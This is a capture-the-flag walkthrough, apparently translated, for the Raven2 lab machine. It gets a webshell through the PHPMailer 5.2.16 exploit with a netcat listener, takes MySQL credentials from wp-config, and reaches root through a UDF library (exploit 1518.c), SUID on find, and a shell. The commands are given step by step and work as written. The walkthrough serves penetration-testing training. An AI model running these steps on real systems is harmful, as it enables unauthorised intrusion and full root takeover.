Target drone Raven2 / UDF privilege escalation

Raven2

Information collection

Survival detection

Detailed scan

Background scanning

dirsearch -u http://10.4.7.135 -x 403
# Filter background pages with status code 403

Webshell

Vulnerability discovery

Access the scanned background page

/vendor page

Found that the website uses PHPMailer

PHPMailer is a PHP library for sending emails. It provides a simple and flexible way to send emails, supports SMTP, POP3 and IMAP protocols, and supports attachments, HTML content, email authentication and other functions. PHPMailer can be used with most mainstream mail servers and mail service providers and is one of the commonly used mail sending tools in PHP development.

Check the VERSION file and find that the version is 5.2.16

Exploiting vulnerabilities

Search for vulnerabilities

serachsploit phpmailer

download

searchsploit -m 40974.py

View the attack script and modify it
- Modify the target IP and add the vulnerable php page.
- Modify kali ip
- Change the location where the backdoor program is stored
  
  Save and exit. The vulnerable web page is in contact.php. Running this attack file will automatically generate a backdoor file icepeak.php in the root directory of the website.
run script
```
python 40974.py
```
File generated successfully
kali turns on nc monitoring
Access the webshell file generated by the script on the website

http://10.4.7.135/backdoor.php
Successfully obtained Webshell

Elevation of privilege

Preparation for privilege escalation

The database account password was found in the wp configuration file wp-config file in the /var/www/html/wordpress directory.

Account root

Password R@v3nSecurity
Try to log into the database
```
mysql -uroot -pR@v3nSecurity
```
Check the contents in the database and find two users

michael

P

P

PBjRvZQ.VQcGZlDeiKToCQd.cPw5XCe0

steven LOLLOL1
You can use steven to log in to the backend

Useless
Utilize tool LinEnum (Linux enumeration and privilege escalation checking tool)
Link: https://pan.baidu.com/s/1AT3PKicE05u6PsykiwCt-g?pwd=s8dt
Extraction code: s8dt

You can see that the MySQL service is running as root

UDF privilege escalation

UDF rights promotion prerequisites

The secure_file_priv item of the mysql configuration file is set to empty (if the directory is specified as NULL or /tmp/, etc., that is, the udf file export location cannot be customized and cannot be used).

show variables like '%secure%'; View the exportable file location

CREATE permissions, FILE permissions (root user has all permissions by default).

Linux systems require write permissions for the plugin directory.

UDF privilege escalation in the Linux environment is most likely limited to the shooting range environment. The reason: under the strict system permissions of Linux, the mysql user or web user does not have write permissions to the plugin directory.

UDF privilege escalation principle

In the MySQL database, the implementation of UDF functions usually requires the creation of a dynamic link library file (also called a plug-in file or plugin file). A dynamic link library is an executable file that can be dynamically loaded into memory when the program is running, linked with the program, and provides additional functions.

UDF functions usually need to be written in a programming language such as C or C++ and compiled into a dynamic link library file. In MySQL, dynamic link library files for UDF functions usually use the .so or .dll extension. This file contains the code of the UDF function and related library files, which can be loaded and used in MySQL.

Privilege escalation process

In Windows, Mysql is generally executed with System permissions. Therefore, the UDF privilege escalation vulnerability occurs mainly because the root user password is leaked, weak passwords, etc., or ordinary users have write permissions to folders such as plugins.

Mysql’s main program mysqld in a Linux environment generally runs with the independent account mysql, while the daemon mysqld_safe has root privileges. Therefore, there are relatively few opportunities for UDF privilege escalation under Linux. UDF privilege escalation will only occur when the mysqld process is executed as root.

For versions of MySQL >= 5.1, the UDF dynamic link library file must be placed in the lib\plugin folder in the MySQL installation directory to create a custom function. Generally, sqlmap and Metasploit come with dynamic link library files corresponding to the system. However, these dynamic link libraries included in sqlmap have been encoded to prevent accidental killing and cannot be used directly. However, you can use the decoding tool cloak.py that comes with sqlmap to decode it.

View the permissions of the current database user

select * from mysql.user where user = substring_index(user(), '@', 1)\G;

Implementation

Find plugin file location
```
 find / -name plugin
```
searchsploit searches for mysql udf vulnerability script and downloads it
```
searchsploit mysql udf
searchsploit -m 1518.c
```

View how to use the vulnerability script

 * Usage:
 *$id
 * uid=500(raptor) gid=500(raptor) groups=500(raptor)
 * $ gcc -g -c 1518.c
 # The -g option is used to generate debugging information during the compilation process to debug when the program errors.
 # The -c option is used to compile the source code into an object file without linking. Compiled object files generally have an extension of .o or .obj.
 * $ gcc -g -shared -Wl,-soname,1518.so -o 1518.so 1518.o -lc
 # Link the 1518.o object file with the C standard library and generate a dynamic link library file named 1518.so.
 * $ mysql -uroot -pR@v3nSecurity
 *[...]
 * python -c 'import pty;pty.spawn("/bin/bash")'
 * mysql> use mysql;
 * mysql> create table foo(line blob);
 # Create a table named zwt in the current database. The table has only one column named line and the data type is blob (binary large object).
 * mysql> insert into foo values(load_file('/tmp/1518.so'));
 # Insert a record into the zwt table. The value of the record is the content of the /tmp/1518.so file loaded through the load_file function. The load_file function is used to read the file content and return its binary data.
 * mysql> select * from foo into dumpfile '/usr/lib/mysql/plugin/1518.so';
 # Save the output of the 1518.so file downloaded under /tmp to the /usr/lib/mysql/plugin dynamic link library directory
 * mysql> create function do_system returns integer soname '1518.so';
 # Create a MySQL function named do_system, which uses the dynamic link library named 1518.so as its implementation
 * mysql> select * from mysql.func;
 # View detailed information of the created function
 * + ---------- + ----- + ---------------- + ---------- +
 * | name | ret | dl | type |
 * + ---------- + ----- + ---------------- + ---------- +
 * | do_system | 2 | 1518.so | function |
 * + ---------- + ----- + ---------------- + ---------- +
 * mysql> select do_system('chmod u + s /usr/bin/find');
 * find ./ aaa -exec '/bin/sh' \;
 * sh-2.05b$ cat /tmp/out
 * uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm)
 *[...]
 *
 * E-DB Note: Keep an eye on https://github.com/mysqludf/lib_mysqludf_sys

kali compilation

Target drone echo

python -c 'import pty;pty.spawn("/bin/bash")'

Target drone download 1518.so
```
cd /tmp
wget http://10.4.7.132/1518.so
```

dynamic link library

mysql -uroot -pR@v3nSecurity
use mysql;
create table foo(line blob);
insert into foo values(load_file('/tmp/1518.so'));
select * from foo into dumpfile '/usr/lib/mysql/plugin/1518.so';
create function do_system returns integer soname '1518.so';
select * from mysql.func;

Execute system commands to grant suid permissions
```
select do_system('chmod u + s /usr/bin/find');
```

find privilege escalation

find / abc -exec '/bin/sh' \;
# \;: Indicates the end symbol of the command. It tells the find command to execute the command once after each matched file or directory.

Successfully obtained root privileges

Summary

Dynamic link library udf privilege escalation
find privilege escalation
suid